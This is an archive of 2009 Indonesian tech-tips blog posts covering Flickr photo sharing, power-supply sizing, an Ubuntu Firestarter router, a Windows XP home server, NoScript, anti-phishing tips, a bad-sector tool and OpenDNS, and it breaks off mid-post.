Kamis, 25 Juni 2009

Free Upload Shared photo with FLICKR

Image atau gambar yang mempunyai hubungan yang erat dengan tulisan yang kita buat di blog akan memberikan nilai tambah bagi tulisan tersebut. Hal ini bisa jadi disebabkan karena kemampuan orang untuk menyampaikan dan menerima informasi berbeda-beda. Biasanya kita membuat tulisan atau artikel di blog karena ingin menyampaikan suatu informasi.

Agar informasi yang disampaikan bisa diterima dan dimengerti dengan baik, kita perlu memanfaatkan berbagai sumberdaya yang ada. Misalnya dengan cara menempatkan link ke artikel dari blog atau website lain yang mempunyai topik yang berhubungan. Menyisipkan image atau gambar juga salah satunya. Untuk itulah kita perlu mencari image atau gambar yang bisa kita gunakan untuk memberi nilai tambah bagi artikel yang kita buat. Banyak website yang memberikan fasilitas ini.

Salah satu website yang memberikan jasa untuk mencari photo di internet adalah Flickr. Flickr bisa kita gunakan sebagai salah satu alternatif untuk keperluan mencari photo di internet. Dan Flickr memang dibuat khusus sebagai tempat berbagi dan bertukar photo di internet. Kita bisa mencari, menelusuri, dan mengupload photo di internet melalui Flickr. Bagi yang hobby di bidang photographi Flickr bisa dijadikan tempat untuk mencari dan menambah pengetahuan mengenai dunia photographi.

Membuat Account

1. Yang pertama kita lakukan sebelum menggunakan Flickr adalah membuat account, dengan membuat account kita bisa mengorganisir photo-photo yang kita sukai atau miliki, klik pada tombol Sign Up! untuk membuat account. Flickr merupakan salah satu layanan yang diberikan oleh Yahoo, karena itu jika kita sudah mempunyai account email dari Yahoo kita bisa menggunakan account tersebut untuk dihubungkan dengan account kita di Flickr.

2.Masukkan nama user dan password klik tombol Sign In jika sudah mempunya account email di Yahoo, atau klik Sign Up untuk membuat account jika belum mempunyai account email di Yahoo. Setelah berhasil Sign In atau membuat account selanjutnya kita di berikan dua pilihan, apakah akan membuat account baru di Flickr atau menggabung account email. Klik CREATE A NEW ACCOUNT untuk membuat account baru.
3.Sekarang kita sudah bisa menggunakan account yang baru dibuat tadi, kita sudah bisa mulai mengupload, atau explorer untuk mencari photo. Kita akan coba mengupload photo dan menempatkannya di blog, klik Upload your first photo dan kita akan dibawa ke layar account yang baru dibuat di Flickr.

4.Dari layar account ini kita bisa melihat dan mengakses berbagai fasilitas yang diberikan oleh Flickr melalui menu yang tersedia dibagian atas, kita akan membahas lebih dalam mengenai setiap fasilitas ini di artikel lain. Yang akan kita coba disini adalah mengupload photo, Flickr memberikan kemudahan untuk mengupload beberapa file sekaligus (maks 6).

5.Pilihlah file yang akan diupload dengan cara mengklik pada tombol Browse. Tags berguna sebagai kategori, dan untuk memudahkan dalam mencari dan mengelompokkan photo. Isilah tags ini sesuai dengan kategori dari photo yang di upload. Privacy settings berguna untuk mensetting tingkat kerahasian photo tersebut. Pilih Private jika photo tersebut bersifat pribadi dan tidak ingin dilihat oleh orang lain kecuali yang anda beri izin, misalnya Teman (Visible to Friends), dan Keluarga (Visible to Family).

6.untuk menyimpan, Pilih Public jika photo tersebut boleh dan ingin dilihat orang lain, klik tombol UPLOAD untuk mengupload photo. Tunggu beberapa saat, dan photo kita sudah berhasil diupload. Ini bisa kita lihat dari layar yang ditampilkan oleh Flickr yaitu layar Describe your photos yaitu untuk menjelaskan makna atau objek dari photo tersebut. Isilah penjelasan singkat mengenai photo tersebut pada kotak yang telah disediakan. Klik tombol SAVE

Cara Menempatkan Photo di Blog

•Langkah selajutnya adalah menempatkan atau menyisipkan photo yang sudah di upload tadi ke dalam artikel di blog, bagaimana cara melakukannya. Berikut langkah-langkah untuk melakukannya. 1) isikan kata kunci atau tags yang pernah kita isikan pada waktu mengupload photo tadi, pada kotak search di sebelah kanan atas layar, 2) klik tanda segitiga pada kotak search untuk melihat menu pilihan dalam mencari photo, 3) pada menu klik Your Photos untuk melakukan pencarian pada photo yang kita miliki.

• Flickr akan menampilkan photo-photo yang mempunyai tags sama dengan yang diinputkan pada kotak search, pilih salah satu photo dengan cara mengklik photo tersebut. Flick akan membawa photo tersebut pada layar untuk membuat commnet, pada bagian atas photo kita melihat beberapa tombol untuk menindak lanjuti photo tersebut. 5) Klik pada tombol ALL SIZES untuk melihat photo dalam beberapa ukuran, dan untuk mengambil kode yang akan disisipkan pada artikel.
• Copy kode yang disediakan oleh Flickr di dalam kotak, dan paste lah pada view code mode di editor blog atau editor yang kita gunakan untuk membuat artikel. Jika photo yang akan ditempatkan lebih dari satu maka kita perlu mengulangi beberapa langkah di atas, yaitu dengan cara mengklik tombol Back pada toolbar browser untuk kembali ke layar sebelumnya. Ulangi langkah 5 dan 6 sampai semua photo berhasil di ambil kodenya.

Nah kita telah selesai mempelajari cara mengupload photo, mengambil kode dan menempatkannya di blog. Kita juga pernah membahas hal serupa ini namun pada website yang berbeda yaitu ImageShack, namun ada perbedaan antara Flickr dan ImageShack ini. Walaupun keduanya memberikan fasilitas yang serupa. Kita bisa menggunakan salah satu atau keduanya, tergantung dari kebutuhan dan selera masing-masing, 


selamat mencoba !!

Sabtu, 20 Juni 2009

Menyisipkan File Eksternal ke dalam document

Anda bisa menggabungkan beberapa dokumen Word ke dalam satu dokumen saja. Dengan cara copy-paste biasa—buka dokumen sumber, salin isinya, lalu paste di dokumen baru—adalah cara yang bisa saja dilakukan, tapi tidak efisien. Jika Anda ingin menyisipkan seluruh isi dokumen sumber ke dokumen utama Anda akan jauh lebih efisien dalam hal waktu jika Anda menggunakan fasilitas menyisipkan file.

Untuk melakukan trik ini, pertama bukalah dokumen baru. Setelah itu, letakkan kursor di bagian yang ingin disisipi dengan isi dokumen lain dan klik menu [Insert] > [Object] > [Text from File...]. Tentukan lokasi dokumen yang isinya ingin diambil lalu klik [Insert] untuk menyisipkan isi file tersebut. Hasilnya dapat segera Anda lihat.

Penyisipan isi dokumen dengan cara ini tentu akan lebih mudah dilakukan ketimbang Anda harus membuka file dokumen lalu menyalin isinya. Dengan begini, waktu Anda pun tidak akan banyak terbuang.

Mampukah Power Supply anda


Sebuah PC terbentuk dari motherboard, prosesor, hard disk, monitor, DVD-ROM, kartu grafis, serta kartu suara. Dua yang terakhir itu bisa on-board. Semua komponen itu perlu listrik untuk bekerja. Makanya, ada satu komponen lagi yang bertugas menyediakan listrik bagi semua perangkat yang ada. Ialah power supply.

Banyak sekali jenis power supply berdasarkan daya yang bisa disediakannya. Ada power supply 500 Watt, 550 Watt, atau 650 Watt. Yang lebih kecil 500 Watt ada, yang lebih besar dari 650 Watt pun banyak.

Jenis power supply tidak bisa dipilih sebarangan. Mudahnya sih beli saja yang Watt-nya besar, misalnya 1000 Watt. Semestinya semua komponen kebagian listrik.

Tapi, apa benar daya yang dibutuhkan seluruh komponen demikian besar? Power supply dengan tenaga lebih itu harganya tidak murah loh. Kalau power supply yang demikian kuat cuma dipakai untuk PC yang komponennya tidak butuh listrik banyak (misalnya kebanyakan komponen yang on-board), namanya buang-buang uang.

Tapi jangan pula asal beli yang angkanya kecil untuk mengirit uang. Lah, kalau power supply-nya loyo, sementara komponen yang harus diberi tenaga demikian banyak, PC enggak bisa menyala dengan benar. Intinya, pilihlah power supply yang sesuai spesifikasi PC. Sesuai berarti lebih besar sedikit dari kebutuhan komponen.

Tak perlu bingung untuk mengetahui besarnya daya power supply yang dibutuhkan. Jumlahkan daya yang dibutuhkan motherboard, prosesor, hard disk, kartu grafis, kartu suara, dan komponen lain. Angka yang didapat itulah daya power supply yang dibutuhkan.

Apa Anda bingung? Bagaimana tahu daya suatu komponen? Jangan bingung. Caranya mudah. 1. Sebelumnya, buatlah daftar seluruh perangkat keras yang Anda gunakan. Utamakan perangkat keras yang tercolok ke motherboard, seperti motherboard, memori, prosesor, hard disk, kartu grafis, dan kartu suara. Dua yang terakhir itu tak perlu didaftarkan kalau on-board. Perangkat sebangsa printer, modem eksternal, atau speaker pun tak perlu didaftarkan.

2. Setelah daftar terbuat, kunjungi situs web beralamat http://extreme.outervision.com/psucalculatorlite.jsp. Masukkan semua data yang dibutuhkan berdasarkan daftar yang sudah Anda buat. Anda memang perlu tahu sekilas data teknis perangkat keras yang digunakan, misalnya tipe prosesor sampai angka buntut-buntutnya. Tak sekadar Intel Core 2 Duo, misalnya, tapi Anda harus tahu pula Core 2 Duo E6650 2330 MHz Conroe atau Core 2 Duo E6700 2660 MHz Conroe. Tenang saja, spesifikasi detail itu bisa dilihat pada kotak yang membungkus perangkat.

3. Kalau semua perangkat sudah dimasukkan, klik [Calculate]. Sip, tunggu sebentar sampai situs web selesai menghitung. Situs web akan menyarankan besarnya power supply yang dibutuhkan. Biasanya, situs web menganjurkan power supply yang sedikit lebih besar dari kebutuhan. Tak apa. Memang seharusnya begitu. Lebih sedikit tak apa, asal jangan kurang. Karena kalau kurang, komputer bisa tidak menyala.

Lagipula, power supply yang diaku-aku memiliki daya 500 Watt, belum tentu memiliki daya penuh 500 Watt. Power supply bekerja lebih efisien ketika dipakai 30 sampai 70 persen dari daya maksimumnya. Ketika Anda menghitung jumlah daya yang dibutuhkan seluruh komponen pada komputer, Anda wajib mengalikan angka itu dengan 1,5. Angka yang Anda dapatkan itulah daya power supply yang sebaiknya Anda miliki.

TIP: Si Penyalur Daya Listrik

Tanpanya, komputer cuma kotak metal dan plastik yang harganya kelewat tinggi. Tanpa siapa sih? Tanpa power supply, tentunya.

Power supply merupakan perangkat yang penting. Ingat, bukan yang paling penting. Sebagai sebuah sistem, komputer terbentuk dari berbagai komponen yang bekerja bahu-membahu. Semua komponen penting. Tanpa power supply, komputer boro-boro bisa dipakai main game, menyala saja tak bisa. Tanpa motherboard, mau dicolok ke mana perangkat-perangkat lain? Tanpa prosesor, siapa yang menghitung? Tanpa memori? Tanpa hard disk? Tak mungkin komputer bisa dipakai. Jadi sekali lagi, semua komponen penting.

Kembali ke power supply. Power supply merupakan perangkat yang menyediakan daya listrik ke komponen. Perangkat yang biasanya terletak di pojok atas casis komputer ini mengubah listrik AC menjadi DC yang dibutuhkan berbagai komponen. Power supply dapat dikenali dengan adanya kipas, tempat kabel tercolok, dan kabel berwarna-warni yang menjulur. Kipas dan tempat kabel tercolok dapat dilihat meski power supply sudah terpasang. Kabel mungkin tak terlihat ketika casis ditutup.

Colokan pada ujung kabel menandakan besarnya tegangan DC. Power supply mengubah tegangan AC 220 volt menjadi beberapa tegangan DC yang lebih rendah. Tegangan DC yang tersedia biasanya 3,3 volt, 5 volt, dan 12 volt. Tak setiap perangkat bisa menggunakan semua tegangan. Misalnya, colokan tegangan 12 volt biasanya digunakan untuk hard disk dan kipas pendingin. Colokan 5 volt dan 3,3 volt digunakan untuk sirkuit digital pada motherboard.

Colokan di ujung kabel dibuat unik untuk setiap tegangan. Hal ini untuk mencegah pemilik komputer salah colok dan mengakibatkan kerusakan komponen.

Standarisasi

Segala hal yang berkaitan dengan power supply sudah standar. Itu hal yang bagus. Mengapa? Nanti Anda tahu sendiri.

Saat ngomong soal power supply, orang sering menyebut “ATX”. Apa sih maksudnya? ATX itu merupakan salah satu standar. Saat ini power supply dibuat untuk kompatibel dengan casis ATX dan motherboard ATX.

Kabel-kabel pada power supply pun sudah standar. Begitu pula colokan di ujung kabel. Di sinilah hal bagus itu. Kita bisa ganti-ganti power supply tanpa perlu khawatir power supply yang baru dibeli tak bisa dicolok ke komputer.

Hitung-Hitung Daya

Kekuatan power supply dihitung berdasarkan daya dalam satuan Watt (apa lagi satuan daya kalau bukan Watt?). Ketika komputer menyala, semua komponen butuh daya listrik. Power supply harus mampu menyediakan daya untuk semua komponen. Berikut adalah tabel yang menyajikan kisaran kebutuhan daya beberapa komponen komputer. PCplus mengutip tabel ini dari situs web PC Power & Cooling.

Komponen & Kisaran Kebutuhan Daya

AGP Video Card: 30W - 50W
PCI Express Video: 100W - 250W
Average PCI Card: 5W - 10W
DVD/CD –ROM: 20W - 30W
Hard Drive: 15W - 30W
Case/CPU Fans: 3W (ea.)
Motherboard: 50W - 150W
RAM: 15W per 1GB
Processor: 80W - 140W

Membangun Router di rumah dengan Ubuntu

Banyak rumah saat ini sudah memiliki akses Internet mandiri. Beberapa di antaranya bahkan telah menggunakan koneksi broadband dengan kecepatan yang lumayan tinggi. Pertanyaannya, bisakah koneksi Internet tersebut dibagi-pakai ke banyak PC atau notebook di rumah? Jawabnya bisa, dengan router!

Router yang akan dibuat — meskipun untuk kelas rumahan — dijamin memiliki kestabilan dan keamanan kelas enterprise karena didukung dengan sistem operasi Linux. Eits, jangan alergi dulu dengan Linux. Linux yang ini sengaja dipilih dari distro Ubuntu Desktop — distro Linux termudah dan banyak digunakan sebagai terminal kerja. Kami jamin, Anda enggak bakal bertemu dengan perintah baris Linux yang banyak ditakuti oleh pengguna awam.

Di sini kita akan menggunakan Linux Ubuntu Desktop versi 8.10 (Intrepid Ibex). Namun pengguna Ubuntu versi di bawahnya juga tetap dapat mengikuti langkah yang sama. Oh ya, router yang akan kita buat menggunakan aplikasi Firestarter (www.fs-security.com) yang punya lisensi gratis 100%. Aslinya, aplikasi ini adalah sebuah firewall dengan fitur router. Jadi router Anda nantinya akan memiliki fasilitas firewall. Asyik, kan?

Mari kita mulai. Sebagai langkah awal, siapkan PC yang sudah ter-instal Ubuntu dan memiliki koneksi Internet aktif sehingga Anda bisa browsing di sana. Jangan lupa sediakan pula sebuah kartu jaringan tambahan untuk menghubungkan Ubuntu ke jaringan lokal.

Instalasi Komponen Utama

 
1. Ada dua komponen utama yang harus di-instal sebelum kita dapat memfungsikan PC sebagai router, yaitu Firestarter dan DHCP (Dynamic Host Configuration Protocol). Komponen DHCP hanya perlu di-instal jika Anda ingin alamat IP dialokasikan otomatis kepada klien. Jika ingin melakukan konfigurasi alamat secara manual, DHCP tidak wajib di-instal. Untuk meng-instal Firestarter dan DHCP, klik menu System > Administration > Synaptic Package Manager (SPM). Kemudian masukkan password root Ubuntu Anda (jika diminta).

2. Dari jendela SPM, manfaatkan fasilitas “Quick Search” untuk mencari paket Firestarter. Jika sudah ketemu, klik kotak kecil di sebelah paket Firestarter dan pilih “Mark for Installation”.

3. Selanjutnya, dengan cara yang sama, lakukan pencarian untuk paket DCHP. Jika SPM menyajikan banyak pilihan, pastikan Anda memilih paket “dhcp3-server”. Klik kembali kotak kecil dan pilih “Mark for Installation”. Kemudian klik tombol “Apply” dengan ikon centang hijau yang ada di atas. Sisanya biar Linux yang mengerjakan.

Konfigurasi Router

 
4. Jika instalasi berjalan dengan mulus, langkah berikutnya adalah melakukan konfigurasi Firestarter agar semua koneksi dari klien bisa diteruskan ke Internet. Jalankan Firestarter dari menu Applications > Internet > Firestarter dan masukkan password root Ubuntu jika diminta.

5. Dari jendela utama Firestarter, klik menu Preferences di bagian atas (pastikan tab “Status” aktif), kemudian pilih Network Setting. Perhatikan 2 kotak drop-down yang ada di sana. Kotak drop-down paling atas adalah antarmuka jaringan yang terkoneksi dengan Internet. Jika menggunakan kartu jaringan Ethernet, antarmuka yang ditunjukkan kemungkinan besar adalah “eth0”. Sementara kotak drop-down kedua menunjukkan antarmuka untuk jaringan lokal.

6. Jika sudah ditentukan mana jaringan Internet dan lokal, Anda tinggal mengaktifkan (centang) opsi “Enable Internet connection sharing” dan “Enable DHCP for the local network” (alokasi IP klien otomatis). Rentang alokasi IP menggunakan DHCP juga bisa Anda tentukan sendiri, dengan mengklik tanda panah hitam di sebelah opsi “DCHP server details”. Opsi lain di jendela ini bisa dibiarkan apa adanya, karena kita tidak terlalu membutuhkannya.

7. Setelah semua selesai disetel, klik tombol “Accept”. Dengan mengklik tombol “Start Firewall”, PC Anda sudah menjadi sebuah router untuk berbagi koneksi Internet. Mudah, bukan?

TIPS: Bonus Firewall

Tidak lengkap rasanya jika sebuah router tidak dilengkapi dengan pengaman tambahan untuk menangkal serangan yang sangat mungkin datang dari sisi Internet. Untungnya, Firestarter memang didesain untuk mengamankan PC yang terhubung ke Internet, termasuk klien-kliennya yang terhubung melalui fasilitas Internet Connection Sharing.

Sebenarnya, secara default, Firestarter sudah bekerja sebagai firewall sejak pertama kali diaktifkan. Tetapi setelan default menurut kami masih memiliki banyak lubang yang jika tidak ditutup bukan tidak mungkin bakal ditembus cracker.

Apabila keamanan menjadi prioritas Anda saat berselancar-ria, tidak ada salahnya mengikuti langkah-langkah sederhana berikut.

A. Menghadang Serangan dari Luar

 
1. Buka kembali jendela Preferences di Firestarter. Kali ini pilih “ICMP Filtering” dan aktifkan (centang) opsi “Enable ICMP Filtering”. Abaikan opsi lain di bawahnya jika memang tidak ada fitur lain dari protokol ICMP yang diizinkan diterima PC. Selanjutnya, klik tombol Accept.


2. Kembali ke jendela utama Firestarter, lalu pilih tab “Policy”. Di opsi Editing, pastikan terpilih “Inbound traffic policy” yang artinya kita akan membuat aturan tentang “siapa saja yang boleh mengakses PC atau port dari sisi Internet”. Jika tidak ada port yang boleh diakses dari Internet, maka pastikan daftar “Allow connection from host”, “Allow service”, dan “Forward service” dalam keadaan kosong. Sebaliknya, jika ingin membolehkan sebuah host dari sisi Internet terkoneksi ke router ini, klik kanan area kosong di daftar “Allow connection from host” dan pilih “Add rule”. Kemudian masukkan alamat IP dari host yang diizinkan mengakses router. Jika sudah, jangan lupa klik tombol “Add” dan “Apply”. Cara yang sama bisa dilakukan untuk membolehkan koneksi port/service dari Internet, hanya saja Anda harus bekerja di daftar “Allow service”.

3. Jika sudah, coba tes PC Anda dengan bantuan situs audit keamanan milik Gibson Research (www.grc.com). Bandingkan hasil sebelum dan sesudah konfigurasi dilakukan (lihat apakah Anda mendapat predikat “Passed” pada TruStealth Analysis atau tidak).


B. Membatasi Akses URL Klien

 
Setelah berhasil membatasi akses dari luar, sekarang kita akan membuat batasan terhadap klien yang akan mengakses Internet. Hal ini sangat berguna jika Anda ingin menghemat bandwidth atau mencegah pengguna di bawah umur mengakses situs yang tidak semestinya. Begini cara melakukannya.

1. Dari jendela utama Firestarter, klik tab “Policy” dan ubah dropdown editing menjadi “Outbound traffic policy”. Opsi ini dipakai untuk membatasi akses klien lokal ke Internet atau kebalikan dari “Inbound traffic policy” yang telah kita bahas di atas.

2. Akan muncul dua radio button yang masing masing berisi opsi “Permissive by default, black list traffic” dan “Restrictive by default, whitelist traffic”. Permissive by default digunakan jika Anda ingin mengizinkan semua lalu lintas data dari klien ke Internet dan menggunakan daftar policy untuk memblok alamat, host atau service/port tertentu. Sebaliknya, Restrictive by default digunakan untuk memblok semua lalu lintas data dari klien ke Internet dan menggunakan daftar policy untuk membolehkan akses ke alamat, host atau service/port tertentu. Jika ingin memblokir alamat tertentu saja, pilih Permissive by default.

3. Untuk memerintahkan agar Firestarter memblokir situs tertentu, lakukan dengan mengklik kanan area kosong di daftar “Deny connection to host”, lalu pilih “Add rule”. Masukkan alamat IP atau nama domain (tanpa “http://”) di field “IP, host or network”, lalu klik Add. Jika sudah, jangan lupa mengklik Apply di bagian atas jendela Firestarter. Coba kunjungi alamat yang diblokir tadi menggunakan browser.

sumber: PCplus

Bikin Server di rumah

PC lama di pojok ruangan itu berdebu sudah. PC itu sudah lumayan lama menganggur meski sebetulnya masih bisa bekerja dengan baik. Tapi, apa daya, teknologi komponen di situ sudah agak ketinggalan zaman untuk keperluan sekarang.

Akan tetapi, bukan berarti PC itu dianggurkan. Daripada tidak terpakai, buat saja PC itu nebjadi sebuah server. Biar lebih mantap lagi, PC itu dijadikan server untuk sebuah jaringan nirkabel di rumah.

Peralatan yang Anda butuhkan adalah kartu jaringan — kalau ada PC yang belum punya kartu jaringan. Alat lainnya adalah access point. Kalau Anda ingin berbagi koneksi internet, tentu saja Anda harus punya modem. Siapkan pula kabel jaringan (RJ45).

Oya. PCplus menggunakan Windows XP untuk pengaturan. Langsung saja ikuti langkah-langkah berikut.

Atur Access Point
1. Pastikan kartu jaringan sudah terpasang pada PC zadul — yang berikutnya akan disebut “server”. Nyalakan access point lalu hubungkan access point ke server dengan kabel jaringan. Pilih salah satu port LAN (kalau ada beberapa port LAN).

2. Pastikan pula kalau pengaturan jaringan lokal di Internet Protocol (TCP/IP) Properties untuk pemilihan alamat IP diatur pada [Obtain an IP address automatically). Begitu pula pengaturan pada server DNS, pilih [Obtain DNS server address automatically].

3. Buka buku (atau file dalam CD) petunjuk penggunaan access point Anda. Cari tahu alamat IP default access point. Access point yang PCplus gunakan memiliki alamat 192.168.1.1. Ketikkan alamat yang Anda dapat itu di browser. Di halaman yang muncul, lakukan login. Password-nya? Lagi-lagi rujuk buku petunjuk penggunaan.

4. Setelah login, masuklah ke bagian pengaturan dasar. Tentukan SSID atau boleh pula disebut sebagai nama jaringan. SSID milik PCplus diberi nama “PCPLUS”.

5. Selanjutnya, atur keamanan jaringan. Carilah bagian yang digunakan untuk itu. Tentukan mode autentifikasi. PCplus memilih WAP. Isikan key-nya. Key ini harus dimasukkan oleh setiap perangkat yang terhubung ke jaringan.

6. Karena access point ini juga akan membagikan koneksi internet ke dalam jaringan, jangan lupa untuk mengaktifkan NAT (Network Address Translation).

7. Tutup browser.

8. Klik kanan pada [My Computer] lalu klik [Properties]. Klik [Computer Name]. Klik [Change]. Lalu isikan “Computer name” dengan “server” dan Workgroup dengan nama “HOME” (tanpa tanda kutip). Semua nama Workgroup pada perangkat yang tercolok harus “HOME” pula. Mumpung ingat, lakukan langkah ke-8 ini pada semua komputer yang akan terhubung ke jaringan.

Berbagi File
1. Balik lagi ke server. Letakkan semua file yang hendak dibagi ke dalam sebuah folder dan sub folder. Misalnya begini. Ada folder bernama “Media”. Di dalam folder media itu ada sub folder “Foto”, “Film”, dan “Lagu”. Share folder “Media”. Caranya, buat yang belum tahu, klik kanan pada folder, lalu klik [Sharing and Security].

2. Pada kotak yang muncul, kalau Anda belum pernah melakukan membagi-pakai folder, muncullah sebuah teks. Klik teks itu. Pada tampilan berikutnya, klik [If you understand the security risk but…]. Lalu pilih [Just enable file sharing]. Klik [OK]. Klik [Share this folder on the network]. Isikan “Share name” dengan “Media”—tanpa tanda kutip. Aktifkan [Allow network users to change my files]. Klik [OK].

3. Sekarang, pergi ke komputer klien, komputer lain yang bukan server. Klik tombol [Start] lalu klik kanan pada [My Computer] dan klik [Map Network Drive]. Pada kotak yang muncul, pilih huruf drive. Klik [Browse]. Cari nama komputer server dan pilih folder “Media” yang tadi di-share. Klik [OK]. Pilih [Reconnect at logon]. Klik [Finish]. Siplah. Server sudah bisa diakses.

Berbagi Printer
1. Colokkan printer ke server. Tentu saja jangan lupa instal driver-nya. Setelah itu, buka Control Panel. Buka Printer and Faxes. Klik kanan pada printer yang hendak dibagi.

2. Pada kotak yang muncul, pilih [Share this printer]. Isikan “Share name” dengan “Printer” (lagi-lagi enggak usah pakai tanda kutip). Klik [OK].

3. Di komputer klien, juga buka Printer and Faxes yang ada pada Control Panel. Klik [Add Printer] pada menu yang ada di kiri. Klik [Next] pada wizard yang muncul. Pilih [A Network Printer] pada jendela wizard berikutnya. Klik [Next]. Pilih [Browse Printer], lalu klik [Next]. Pilih komputer server pada daftar. Klik [Next]. Pada kotak yang muncul, klik [Yes]. Pilih [Yes] lalu klik [Next] pada kotak berikutnya. Klik [Finish].

Berbagi Koneksi Internet
1. Colok modem ke access point pada bagian WAN.

2. Buka lagi alamat IP access point dengan browser untuk melakukan pengaturan. Pada bagian pengaturan WAN, pastikan DHCP terpilih sebagai tipe koneksi internet. Simpan semua pengaturan.

3. Access point sudah bisa dilepas dari server.


Selamat mencoba.bro

Bebaskan Firefox dari Skrip Jahat



Banyak orang beranggapan Mozilla Firefox itu merupakan browser paling aman. Apalagi dengan adanya dukungan dari komunitas open source yang cukup besar, lubang-lubang keamanan yang muncul dapat segera dibenahi. Itu yang menyebabkan browser berlambang rubah api ini menjadi favorit.

Lalu muncul anggapan di pengguna awam yang berpendapat bahwa dengan hanya bermodalkan browser apik ini komputer akan aman dari serangan hacker. Padahal belum tentu. Kalau mau aman —tapi tak 100% aman —antivirus, antispyware, firewall, dan alat perang lainnya harus dipasang.

NoScript adalah salah satu ekstensi Firefox yang bisa digunakan untuk mengamankan browser. Ekstensi yang dapat diunduh gratis dari situs www.noscript.net ini bisa diandalkan untuk memblokir segala jenis skrip (khususnya JavaScript) yang ditanamkan dalam sebuah situs web.

Setelah di-instal, aturlah NoScript dengan cara mengklik kanan pada jendela Firefox, lalu pilih menu [NoScript] > [Options…]. Pada tab [General] yang terbuka, berikan wildcard terhadap situs-situs yang sudah bisa dipastikan keamanannya.

Jika kedapatan sebuah skrip dalam sebuah situs, NoScript ini akan memberitahukannya dengan memunculkan pesan seperti ini: “Scripts Currently Forbidden”. Jika dirasa tidak membahayakan, klik [Options] > [Temporarily allow file://] atau [Options…] > [Allow file://] untuk membolehkan skrip sejenis ini berjalan secara terus-menerus.

10 Tips Mencegah Serangan Phising

Serangan phising atau jerat dunia maya belakangan ini menyerang pengguna Facebook. Satu-satunya cara mengatasi serangan yang memanfaatkan celah kelemahan sosial pengguna adalah dengan melakukan sikap hati-hati.
Dalam serangan tersebut penyebar phising berusaha mengambil alih akun Facebook dengan mengirimkan link halaman website palsu yang tampilannya benar-benar mirip Facebook. Bergitu pengguna Facebook terjebak dan dengan sukarela memasukkan nama Logon dan Password, otomatis informasi tersebut akan masuk ke data si penjahat dan akan dimanfaatkan untuk kepentingannya sendiri seperti menyebar spam alias iklan sampah ke akun-akun lain yang saling terkait.
Kaspersky lab memperkirakan distribusi kode jahat melalui situs jejaring sosial ini 10 kali lebih efektif menginfeksi dibandingkan dengan penyebaran melalui email. Sebab, pengguna internet jauh lebih tertarik untuk mengklik sebuah link yang diterima dari teman mereka, dibandingkan link dari pesan spam yang random.
"Tetap waspada dan lakukan tindakan pencegahan yang tepat merupakan kunci untuk tidak masuk ke dalam perangkap mereka," ujar David Emm, anggota dari Tim Penelitian dan Analisa Global Kaspersky Lab.

Berikut 10 tips Kaspersky Lab untuk mencegah dari serangan phising :

  1. Untuk situs sosial seperti Facebook, buat bookmark untuk halaman login atau mengetik URL www.facebook.com secara langsung di browser address bar.
  2. Jangan mengklik link pada pesan email.
  3. Hanya mengetik data rahasia pada website yang aman.
  4. Mengecek akun bank Anda secara regular dan melaporkan apapun yang mencurigakan kepada bank Anda.
  5. Kenali tanda giveaway yang ada dalam email 
  6. Menginstall software untuk kemanan internet dan tetap mengupdate Antivirus.
  7. Menginstall Patch keamanan.
  8. Waspada terhadap email dan pesan instan yang tidak diminta.
  9. Berhati-hati ketika login yang meminta hak Administrator. Cermati alamat URL-nya yang ada di address bar.
  10. Back up data anda.

Kamis, 18 Juni 2009

Bad sector pada harddisk

Punya masalah bad sector pada harddisk komputermu? Kalau iya, jangan vonis mati dahulu harddisk kamu sebelum menjajal tools software Repair HDD Bad Sector yang satu ini. Karena program yang bersifat under DOS ini mampu mendeteksi bagian bad sector pada harddisk untuk selanjutnya melakukan perbaikan.

Karena cara kerja program ini melalui modus DOS, kamu harus menjalankannya melalui boot cd dari software ini. Begitu masuk ke dalam layar tampilan awal program, kamu bisa memilih modus start-up yang kamu inginkan.

Selain mendukung driver pada CD/DVD ROM, program ini juga mendukung partisi FAT32 dan NTFS.

Selanjutnya setelah memilih menu Start-Up, akan tampil menu utama berikut. Dari menu ini kamu bisa memulai pengecekan pada Harddisk kamu.

Di bawah ini merupakan proses pengecekan dari Repair HDD Bad Sector, apabila program mendapatkan adanya bagian yang corrupt pada harddisk (bad sector), maka secara otomatis program akan melakukan perbaikan pada bagian bad sector tersebut.

Repair HDD Bad Sector Processing

Sebagai catatan, link download Repair HDD Bad Sector dalam format image (ISO). Jadi setelah mendownload ekstrak file (rar) terlebih dahulu, kemudian kamu bisa langsung membakarnya melalui program bakaran yang biasa kamu pakai. Selanjutnya lakukan boot melalui CD untuk menjalankan program.

Senin, 15 Juni 2009

Manfaatkan Open DNS

Tips berikut ini bisa dicoba untuk mempercepat koneksi internet dan mempercepat waktu loading halaman web dari browser kita, dengan cara mengubah setting DNS koneksi internet kita. Aku dapet info awalnya dari sebuah forum, dan setelah aku coba hasil speed test nya lumayan juga.
Berikut ini hasil speed test ketika pakai DNS default milik Indosat IM2 :



Dan ini hasil speed test setelah setting DNS aku ganti :



Lumayan ada peningkatan download speed dan upload speed-nya.
Buat yang belum tau apa itu DNS (Domain Name Server), mungkin penjelasan kasarnya sbb : tiap komputer yang konek ke internet punya identifikasi/alamat yang disebut nomor IP. Misal, IP-nya Google adalah 208.67.219.231. Nomor-nomor IP ini berupa deretan angka yang tentunya susah buat dihapal, contohnya, lebih gampang bagi kita buat menghapal bahwa kalo mau buka Google cukup ketik nama aliasnya yang www.google.com di browser daripada harus hapalin alamat aslinya yang 208.67.219.231 itu.

Lalu bagaimana prosesnya tahu nama alias xxx itu mengarah ke alamat IP yang mana?

Untuk menterjemahkan nama alias menjadi alamat IP yang dituju itulah gunanya server DNS. DNS ini berisi database yang menyimpan data nomor-nomor IP beserta asosiasi nama aliasnya. Jadi kita cukup melakukan setting untuk mengarahkan koneksi internet kita ke server DNS. Lalu kalau kita mengetikan nama alias www.google.com di browser, maka DNS server yang akan mencari nomor IP yang dimaksud.

Kalau DNS servernya telmi (telat mikir), ya browser kita pasti ikutan bolot juga.
Setting DNS bisa dilihat dari menu Start - Control Panel - Network Connection, lalu pilih koneksi internet kita dan buka properties-nya. Pilih Tab “Networking”, pilih internet protocol (tcp/ip) lalu klik tombol Properties.



Atau kalau koneksi internet pake aplikasi dari modem bisa di set dari dalam aplikasi modemnya itu. Kalau aku pakai aplikasi dari modem 3G bawaan Indosat M2, settingnya ada di menu Setting - Network Settings, seperti di bawah ini.



Ok. Langsung saja kita coba ganti DNS nya. Kalau defaultnya DNS punya Indosat M2 biasanya ke nomor IP 202.155.0.10 untuk prefered dan 202.155.0.15 untuk alternate DNS. Dari pada nyolong-pinjam DNS orang lain yang mungkin suatu saat diblok, kita akan ganti pakai Open DNS (DNS public yang legal buat dipakai bebas) yang berikut ini :

